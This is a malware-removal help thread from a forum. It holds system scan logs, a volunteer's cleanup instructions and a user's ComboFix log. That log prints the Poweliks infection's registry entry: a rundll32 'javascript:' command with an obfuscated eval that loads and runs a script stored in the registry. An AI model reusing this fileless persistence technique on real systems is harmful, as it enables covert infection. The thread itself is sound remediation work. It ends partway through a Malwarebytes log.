Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: Hewlett-Packard
Service: 
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (08/23/2014 04:24:01 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\HISTORY-JOURNAL> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:53 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOGIN DATA> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\MANIFEST-000002> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:51 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\WEB DATA-JOURNAL> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES-JOURNAL> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\TOP SITES> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOCK> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:49 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\LOG> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (08/23/2014 04:23:46 PM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SAVAS.KYRIAKIDIS\APPDATA\LOCALLOW\GAMEJOINT\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\EXTENSION RULES\000002.DBTMP> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
 
System errors:
=============
Error: (08/23/2014 04:23:55 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (08/23/2014 04:23:32 PM) (Source: WMPNetworkSvc) (EventID: 14325) (User: )
Description: WMPNetworkSvc0x80070424
 
Error: (08/23/2014 04:23:31 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
Description: KtmRm for Distributed Transaction Coordinator2147942438 (0x80070026)
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: AVGIDSDriver
AVGIDSShim
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: vToolbarUpdater%%2
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: AVGIDSAgentAVGIDSDriver%%31
 
Error: (08/23/2014 04:22:44 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Computer Browser%%1060
 
Error: (08/23/2014 04:13:21 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
Error: (08/23/2014 04:09:54 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
Error: (08/23/2014 04:04:22 PM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: PEVSystemStart
 
 
Microsoft Office Sessions:
=========================
Error: (08/14/2012 04:50:33 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 3, Application Name: Microsoft Office PowerPoint, Application Version: 12.0.6600.1000, Microsoft Office Version: 12.0.6425.1000. This session lasted 228 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (12/21/2010 06:24:53 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6545.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 61 seconds with 60 seconds of active time.  This session ended with a crash.
 
Error: (10/09/2010 05:15:00 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6541.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 19 seconds with 0 seconds of active time.  This session ended with a crash.
 
Error: (03/25/2010 00:21:12 PM) (Source: Microsoft Office 12 Sessions) (EventID: 7001) (User: )
Description: ID: 0, Application Name: Microsoft Office Word, Application Version: 12.0.6504.5000, Microsoft Office Version: 12.0.6425.1000. This session lasted 60 seconds with 0 seconds of active time.  This session ended with a crash.
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-08-23 16:55:09.878
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.753
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.581
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.441
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.223
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:09.113
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:08.989
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:55:08.879
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:54:50.034
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-08-23 16:54:49.909
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\NisDrvWFP.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core2 Duo CPU E4600 @ 2.40GHz
Percentage of memory in use: 54%
Total physical RAM: 3069.46 MB
Available physical RAM: 1392.41 MB
Total Pagefile: 6375.2 MB
Available Pagefile: 4531.66 MB
Total Virtual: 2047.88 MB
Available Virtual: 1882.66 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:450.71 GB) (Free:223.01 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive d: (RECOVERY) (Fixed) (Total:15 GB) (Free:10.55 GB) NTFS
Drive f: () (Removable) (Total:14.61 GB) (Free:13.1 GB) FAT32
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 10000000)
Partition 1: (Not Active) - (Size=47 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=15 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=450.7 GB) - (Type=07 NTFS)
 
========================================================
Disk: 1 (Size: 14.6 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=14.6 GB) - (Type=0C)
 
==================== End Of Log ============================

My name's Naathim and I'm a GeekU Minion! Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat :)

Before we start please note the following:

  • Analysis and research take some time, also sometimes real life gets in the way, please be patient.
  • Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
  • Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
  • Paste the logs in your posts, attachments make my work harder and more complicated.
  • Stay with me to the end, the absence of symptoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, which may cause some delays between answers.

I can't foresee everything, so if anything unexpected happens, please stop and inform me!

There are no silly questions. Never be afraid to ask if in doubt!

Let's start and enjoy the fight! :)

Rules and policies

We won't support any piracy.

That being said, if any evidence of an illegal OS, software, cracks/keygens or anything similar is revealed, any further assistance will be suspended. If you are aware that there is this kind of stuff on your machine, remove it before proceeding!

The same applies to any use of P2P software: uTorrent, BitTorrent, Vuze, Kazaa, Ares... We don't provide any help for P2P, except for their removal. All P2P software has to be uninstalled or at least fully disabled before proceeding!

Failure to follow these guidelines will result in closing your topic and withdrawing any assistance.

You have got a Poweliks infection.

Scan with ComboFix

This is a very powerful tool that should be used only if advised by a Malware Analyst.

Do not run ComboFix on your own!

Referring to this instruction, please download ComboFix by sUBs and save it to your desktop.

Temporarily disable your AntiVirus and AntiSpyware protection - instructions here.

If you are a user of CD emulation software (like Daemon Tools or Alcohol) also disable it for the cleaning process - instructions here.

  • Right-click on the ComboFix icon and select Run as Administrator to start the tool.
  • Accept the disclaimer and agree if prompted to install Recovery Console.
  • Do not take any actions while ComboFix goes through your System - it may cause it to stall!
  • This scan may take some time!
  • When finished - it will display a logfile (located also on your main drive, usually C:\ComboFix.txt).

Include that log in your next reply.

If you encounter any issues with your internet connection after running ComboFix, please visit this link.

If an error about an operation on a key marked for deletion appears after running the tool, please reboot your machine.

Don't forget to re-enable your previously switched-off protection software!


Hello, Naat.

 

Here's the Combofix log. I see a reference to the Poweliks infection you mentioned.

 

ComboFix 14-08-21.01 - savas.kyriakidis 08/24/2014  15:26:27.3.2 - x86
Running from: F:\ComboFix.exe
.
.
(((((((((((((((((((((((((((((((((((((((   Other Deletions   )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
.
CLSID={AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} - infected with Poweliks and removed.
You should verify if current CLSID data is correct: 
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}
   <NO NAME> REG_SZ         Thumbnail Cache Class Factory for Out of Proc Server
   AppID REG_SZ         {AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\InprocServer32
   <NO NAME> REG_EXPAND_SZ   %SYSTEMROOT%\system32\thumbcache.dll
   ThreadingModel REG_SZ         Apartment
.
HKEY_CLASSES_ROOT\clsid\{ab8902b4-09ca-4bb6-b78d-a8f59079a8d5}\localserver32
   <NO NAME> REG_SZ         rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charCodeAt()-1);}))
   a REG_SZ         [encoded script payload removed]
.
(((((((((((((((((((((((((   Files Created from 2014-07-24 to 2014-08-24  )))))))))))))))))))))))))))))))
.
.
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Rita\AppData\Local\temp
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Guest\AppData\Local\temp
2014-08-24 19:38 . 2014-08-24 19:38 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-08-23 20:54 . 2014-08-23 21:01 -------- d-----w- C:\FRST
2014-08-23 20:30 . 2014-08-23 21:21 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-08-23 20:30 . 2014-08-23 20:30 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-08-23 20:30 . 2014-05-12 11:26 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-08-23 20:30 . 2014-05-12 11:25 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-08-23 20:30 . 2014-05-12 11:25 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-08-23 20:16 . 2014-08-24 19:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\temp
2014-08-23 15:51 . 2014-08-23 15:53 -------- d-----w- C:\AdwCleaner
2014-08-23 15:42 . 2014-08-23 15:42 -------- d-----w- c:\windows\ERUNT
2014-08-23 15:02 . 2014-08-23 15:05 -------- d-----w- c:\programdata\Spybot - Search & Destroy
2014-08-22 21:06 . 2013-09-04 18:57 24040 ----a-w- c:\windows\system32\drivers\gfiutil.sys
2014-08-22 21:06 . 2013-05-23 12:39 43368 ----a-w- c:\windows\system32\drivers\gfiark.sys
2014-08-22 21:05 . 2014-08-23 01:40 -------- d-----w- C:\VIPRERESCUE
2014-08-22 21:05 . 2014-08-22 21:05 -------- d-----w- C:\EEK
2014-08-22 18:00 . 2014-08-23 20:48 -------- d-----w- c:\programdata\HitmanPro
2014-08-22 17:41 . 2014-08-22 17:41 -------- d-----w- c:\programdata\DameWare Development
2014-08-22 17:41 . 2014-08-22 17:54 -------- d-----w- c:\windows\dwrcs
2014-08-20 23:17 . 2014-08-20 23:17 319456 ----a-w- c:\windows\DIFxAPI.dll
2014-08-20 22:12 . 2014-08-19 22:12 75264 ----a-w- c:\windows\system32\drivers\dfsc.sys
2014-08-20 22:08 . 2014-08-20 22:08 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\UINoteworthy
2014-08-20 03:07 . 2014-08-20 03:07 -------- d-----w- c:\programdata\GlarySoft
2014-08-16 21:57 . 2014-08-17 21:23 -------- d-----w- c:\programdata\AVG2014
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\MFAData
2014-08-16 21:05 . 2014-08-16 21:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Avg2014
2014-08-16 16:05 . 2014-08-16 16:05 -------- d-----w- c:\programdata\SlimWare Utilities Inc
2014-08-16 16:04 . 2014-08-16 16:04 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\Downloaded Installers
2014-08-16 00:57 . 2014-08-16 16:05 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\SlimWare Utilities Inc
2014-08-16 00:56 . 2014-08-16 13:22 -------- d-----w- c:\program files\DriverUpdate
2014-08-15 17:04 . 2014-08-15 17:21 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\TeamViewer
2014-08-14 22:20 . 2014-08-14 22:20 17216 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-08-14 22:19 . 2014-08-04 07:06 101664 ----a-w- c:\windows\system32\BootDefrag.exe
2014-08-14 22:19 . 2014-07-18 07:11 16064 ----a-w- c:\windows\system32\drivers\BootDefragDriver.sys
2014-08-14 22:19 . 2014-08-23 15:16 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\DiskDefrag
2014-08-14 22:19 . 2014-08-14 22:19 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\GlarySoft
2014-08-14 22:19 . 2014-08-22 17:27 -------- d-----w- c:\program files\Glary Utilities 5
2014-08-14 01:28 . 2014-08-14 01:28 -------- d-----w- c:\program files\iPod
2014-08-14 01:28 . 2014-08-14 01:31 -------- d-----w- c:\programdata\188F1432-103A-4ffb-80F1-36B633C5C9E1
2014-08-14 00:53 . 2014-08-14 00:53 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin5.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin4.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin3.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin2.dll
2014-08-14 00:53 . 2014-08-14 00:52 159744 ----a-w- c:\program files\Internet Explorer\Plugins\npqtplugin.dll
2014-08-14 00:51 . 2014-08-14 00:52 -------- d-----w- c:\program files\QuickTime
2014-08-13 01:20 . 2014-08-13 01:20 -------- d-----w- c:\programdata\WindowsSearch
2014-08-12 22:03 . 2014-08-12 22:03 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\42a495
2014-08-12 22:02 . 2014-08-22 20:10 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\42a495
2014-08-12 21:58 . 2014-08-15 07:47 -------- d-----w- c:\users\savas.kyriakidis\AppData\Local\browser_dir
2014-08-12 20:53 . 2014-08-23 01:40 -------- d-----w- c:\users\savas.kyriakidis\AppData\Roaming\Puorfu
2014-08-12 20:51 . 2014-08-12 20:51 -------- d-----w- c:\programdata\IrfuqApivh
2014-08-12 20:33 . 2014-08-12 20:37 20480 ----a-w- c:\program files\Internet Explorer\version1.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-06-17 20:17 . 2014-06-17 20:17 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray.exe"="c:\windows\ehome\ehTray.exe" [2008-01-21 125952]
"Akamai NetSession Interface"="c:\users\savas.kyriakidis\AppData\Local\Akamai\netsession_win.exe" [2014-04-18 4672920]
"iCloudServices"="c:\program files\Common Files\Apple\Internet Services\iCloudServices.exe" [2013-10-31 59720]
"com.apple.dav.bookmarks.daemon"="c:\program files\Common Files\Apple\Internet Services\BookmarkDAV_client.exe" [2013-10-02 59720]
"ApplePhotoStreams"="c:\program files\Common Files\Apple\Internet Services\ApplePhotoStreams.exe" [2013-10-31 59720]
"IrfuqApivh"="c:\programdata\IrfuqApivh\IrfuqApivh.dat" [2014-08-19 252020]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-08-18 37152]
"UINoteworthy"="c:\users\savas.kyriakidis\AppData\Local\UINoteworthy\UINoteworthy.dll" [2014-08-20 325632]
"Spybot-S&D Cleaning"="c:\windows\dwrcs\Uploads\SpybotPortable\App\Spybot\SDCleaner.exe" [2014-06-24 4566952]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ECenter"="c:\dell\E-Center\EULALauncher.exe" [2008-02-29 17920]
"RtHDVCpl"="RtHDVCpl.exe" [2008-03-06 4706304]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2006-11-10 90112]
"dscactivate"="c:\program files\Dell Support Center\gs_agent\custom\dsca.exe" [2008-03-11 16384]
"PCMService"="c:\program files\Dell\MediaDirect\PCMService.exe" [2008-01-14 132392]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2012-02-23 59240]
"HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
"PMBVolumeWatcher"="c:\program files\Sony\PMB\PMBVolumeWatcher.exe" [2010-03-24 599328]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2011-06-15 997920]
"AVG_TRAY"="c:\program files\AVG\AVG10\avgtray.exe" [2011-09-10 2338656]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-07-31 43816]
"acevents"="c:\program files\ActivIdentity\ActivClient\acevents.exe" [2009-06-03 153640]
"accrdsub"="c:\program files\ActivIdentity\ActivClient\accrdsub.exe" [2009-06-03 400936]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2014-01-17 421888]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-08-01 152392]
"DameWare MRC Agent"="c:\windows\dwrcs\DWRCST.exe" [2012-11-02 379752]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"HideFastUserSwitching"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\explorer]
"UseDefaultTile"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk * \0BootDefrag.exe\0sasnative32
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37]
@=""
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\hitmanpro37.sys]
@=""
.
S2 ac.sharedstore;ActivIdentity Shared Store Service;c:\program files\Common Files\ActivIdentity\ac.sharedstore.exe [2009-06-03 207400]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
HPZ12 REG_MULTI_SZ   Pml Driver HPZ12 Net Driver HPZ12
HPService REG_MULTI_SZ   HPSLPSVC
hpdevmgmt REG_MULTI_SZ   hpqcxs08 hpqddsvc
LocalServiceAndNoImpersonation REG_MULTI_SZ   FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-24 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-08-18 01:05]
.
2014-08-24 c:\windows\Tasks\RtlNICDiagVistaStart.job
- c:\program files\Realtek\RTNICDiag\RTNICDiag.exe [2008-08-06 11:44]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/
uInternet Settings,ProxyOverride = *.local;<local>
TCP: DhcpNameServer = 192.168.2.1 66.18.32.2 66.18.32.3
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2014-08-24 15:40
Windows 6.0.6002 Service Pack 2 NTFS
.
scanning hidden processes ...  
.
scanning hidden autostart entries ... 
.
scanning hidden files ...  
.
scan completed successfully
hidden files: 0
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3726736968-409882640-1958551794-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-383984)
.
------------------------ Other Running Processes ------------------------
.
c:\windows\system32\Ati2evxx.exe
c:\windows\system32\Ati2evxx.exe
c:\program files\Dell\DellDock\DockLogin.exe
c:\windows\system32\WLANExt.exe
c:\program files\Common Files\Adobe\ARM\1.0\armsvc.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\program files\AVG\AVG10\avgfws.exe
c:\program files\AVG\AVG10\avgwdsvc.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\windows\dwrcs\DWRCS.EXE
c:\windows\system32\lxblcoms.exe
c:\windows\system32\msiexec.exe
c:\program files\HTC\Internet Pass-Through\PassThruSvr.exe
c:\program files\Sony\PMB\PMBDeviceInfoProvider.exe
c:\program files\NETGEAR\WNA1100\WifiSvc.exe
c:\windows\system32\WUDFHost.exe
c:\program files\AVG\AVG10\avgnsx.exe
c:\program files\Dell\DellDock\DellDock.exe
c:\program files\Glary Utilities 5\Integrator.exe
c:\windows\RtHDVCpl.exe
c:\windows\System32\rundll32.exe
c:\program files\ActivIdentity\ActivClient\acsagent.exe
c:\program files\HP\Digital Imaging\bin\hpqtra08.exe
c:\program files\NETGEAR\WNA1100\WNA1100.exe
c:\program files\Microsoft Office\Office12\ONENOTEM.EXE
c:\program files\ATI Technologies\ATI.ACE\Core-Static\MOM.EXE
c:\windows\ehome\ehmsas.exe
c:\windows\system32\rundll32.exe
c:\program files\iPod\bin\iPodService.exe
c:\program files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
c:\program files\HP\Digital Imaging\bin\hpqSTE08.exe
c:\program files\HP\Digital Imaging\bin\hpqbam08.exe
c:\program files\HP\Digital Imaging\bin\hpqgpc01.exe
c:\program files\Common Files\Apple\Internet Services\APSDaemon.exe
c:\\?\c:\windows\system32\wbem\WMIADAP.EXE
c:\program files\Windows Media Player\wmpnetwk.exe
c:\windows\system32\rundll32.exe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
c:\users\savas.kyriakidis\AppData\LocalLow\UIMobile\ValidatorVisual\browser.exe
.
**************************************************************************
.
Completion time: 2014-08-24  15:45:51 - machine was rebooted
ComboFix-quarantined-files.txt  2014-08-24 19:45
ComboFix2.txt  2014-08-23 20:16
ComboFix3.txt  2014-08-23 18:22
.
Pre-Run: 238,198,915,072 bytes free
Post-Run: 238,199,603,200 bytes free
.
- - End Of File - - 836BEC6E629D99F479DEE501CB2CA845
5C616939100B85E558DA92B899A0FC36

Good so far.


Scan with Malwarebytes' Anti-Malware

Please download and install Malwarebytes Anti-Malware, or re-run it if you already have it installed.

  • First of all select update.
  • Once updated, click the Settings tab, in the left panel choose Detections & protection and tick Scan for rootkits.
  • Click the Scan tab, make sure Threat Scan is checked and click Scan Now.
  • If threats are detected, click the Apply Actions button. You will now be prompted to reboot. Click Yes.
  • Upon completion of the scan (or after the reboot), click the History tab.
  • Click Application Logs and double-click the Scan Log.
  • At the bottom click Export and choose Text file.

Save the file to your desktop and include its content in your next reply.



Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool.

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > Windows 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please include their content in your next reply.


I was able to run MBAM and FRST without having to go into safe mode. So, that's progress at least. Still getting a lot of automatic web page generation, though. Here are the requested logs:

 

MBAM

 

Malwarebytes Anti-Malware
www.malwarebytes.org
 
Scan Date: 8/25/2014
Scan Time: 8:28:24 AM
Logfile: MBAM.txt
Administrator: Yes
 
Version: 2.00.2.1012
Malware Database: v2014.08.25.02
Rootkit Database: v2014.08.21.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled
 
OS: Windows Vista Service Pack 2
CPU: x86
File System: NTFS
User: savas.kyriakidis
 
Scan Type: Threat Scan
Result: Completed
Objects Scanned: 355293
Time Elapsed: 27 min, 27 sec
 
Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled
 
Processes: 0
(No malicious items detected)
 
Modules: 0
(No malicious items detected)
 
Registry Keys: 4
